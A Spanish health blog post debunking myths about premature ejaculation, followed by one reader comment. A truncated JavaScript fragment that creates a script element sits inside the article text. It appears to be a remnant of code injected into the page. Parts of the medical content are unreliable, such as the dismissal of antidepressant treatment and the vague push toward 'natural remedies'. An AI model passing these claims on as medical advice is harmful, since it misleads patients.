Salud y belleza » Enfermedades, Salud

Eyaculación precoz: mitos y verdades

1 Comentario

eyaculación-precozA la disfunción sexual masculina se le llama eyaculación precoz. Alrededor de esta disfunción surgen muchos mitos y también algunas verdades, pero muchas personas no pueden diferenciarlas. Por eso verificamos y desmentimos los más comunes en este artículo:

Una de las afirmaciones más comunes es que la masturbación es una de las principales causas de la eyaculación precoz. Es un mito puesto que no se ha demostrado que haya relación directa entre ambas. Sin embargo, este mito está muy extendido por otra razón que si es verdad, que el aprendizaje erróneo originado por practicar erróneamente la masturbación si puede ocasionar eyaculación precoz. Esto ocurre porque cuando los jóvenes se masturban tienden a hacerlo de forma rápida y apresurada y esto genera malos hábitos y costumbres sexuales que se traducen en relaciones sexuales más cortas.

Otro de los mitos más extendidos es que el alcohol, la marihuana y otras drogar sirven de remedio para la eyaculación precoz. Es mentira, lo que ocurre es que la eyaculación es un reflejo y, como tal, se ve alterado como consecuencia de los efectos secundarios de estas sustancias. Sin embargo, a la larga pueden provocar disfunción eréctil, pérdida del deseo sexual… Es una absurdez ingerir estos productos perjudiciales para la salud cuando existen remedios naturales para la disfunción.

A menudo se piensa también que la eyaculación precoz es una consecuencia de la infertilidad, sin embargo, son dos patologías completamente distintas que no tienen nada que ver entre si, por lo que además de un mito es algo absurdo.

Otra gran afirmación es que los tratamientos con antidepresivos ayudan a tratar la eyaculación precoz. Lo cierto es que algunos profesionales los mandan a sus pacientes pero no es el tratamiento más recomendado ya que origina otros efectos adversos.

Esperemos que con estas aclaraciones sepamos un poco más sobre la eyaculación precoz y no creamos todos los rumores o mitos que nos cuentan.

¿Padece eyaculación precoz? ¿Qué tratamiento toma?var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : ,

One Comment »

  • Tere said:

    Algunas cosas es que son obvias. Yo creo que es más un problema psicoógico. ¿Puede ser?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.